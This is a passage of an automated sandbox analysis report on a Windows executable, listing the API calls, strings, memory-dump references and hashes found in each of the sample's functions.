                                                                                                                  • Opcode Fuzzy Hash: 389f486f2d99b0acbbe2e832d5b999096831549b6c3d6258d1ea0558c1299e51
                                                                                                                  • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                                  APIs
                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                                  • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                                  • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                                  • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                                  • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                                  • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                                    • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                                    • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                                    • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                                  Strings
                                                                                                                  • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                  • API String ID: 440038798-2785691316
                                                                                                                  • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                  • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                                  • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                  • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                                  APIs
                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                                  • _wcslen.LIBCMT ref: 004610A3
                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                                    • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                                  • String ID: ThumbnailClass
                                                                                                                  • API String ID: 4136854206-1241985126
                                                                                                                  • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                  • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                                  • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                  • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                                  APIs
                                                                                                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                                  • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                                  • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                                  • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                  • String ID: 2
                                                                                                                  • API String ID: 1331449709-450215437
                                                                                                                  • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                  • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                                  • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                  • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                  • __swprintf.LIBCMT ref: 00460915
                                                                                                                  • __swprintf.LIBCMT ref: 0046092D
                                                                                                                  • _wprintf.LIBCMT ref: 004609E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                                  • API String ID: 3054410614-2561132961
                                                                                                                  • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                  • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                                  • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                  • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                                  • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                                  • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                  • API String ID: 600699880-22481851
                                                                                                                  • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                  • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                                  • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                  • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DestroyWindow
                                                                                                                  • String ID: static
                                                                                                                  • API String ID: 3375834691-2160076837
                                                                                                                  • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                  • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                                  • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                  • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                                  • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                  • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                                  • API String ID: 2907320926-3566645568
                                                                                                                  • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                  • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                                  • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                  • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                  • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                                  • DeleteObject.GDI32(005C0000), ref: 00470A04
                                                                                                                  • DestroyIcon.USER32(006F004C), ref: 00470A1C
                                                                                                                  • DeleteObject.GDI32(422BD03E), ref: 00470A34
                                                                                                                  • DestroyWindow.USER32(006E006F), ref: 00470A4C
                                                                                                                  • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                                  • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                                  • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1237572874-0
                                                                                                                  • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                  • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                                  • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                  • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                                  APIs
                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                                  • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                                  • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                                  • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2706829360-0
                                                                                                                  • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                  • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                                  • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                  • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                                  • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                                  • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                                  • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 541375521-0
                                                                                                                  • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                  • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                                  • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                  • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3413494760-0
                                                                                                                  • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                                  • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                                  • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                                  • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _strncmp
                                                                                                                  • String ID: '$DEFINE$\$`$h$h
                                                                                                                  • API String ID: 909875538-3708680428
                                                                                                                  • Opcode ID: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                                                                                                                  • Instruction ID: 816ce89e9d314c50cae2ff635e2dae77420ade2a81b985ada7b38a9c48760da0
                                                                                                                  • Opcode Fuzzy Hash: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
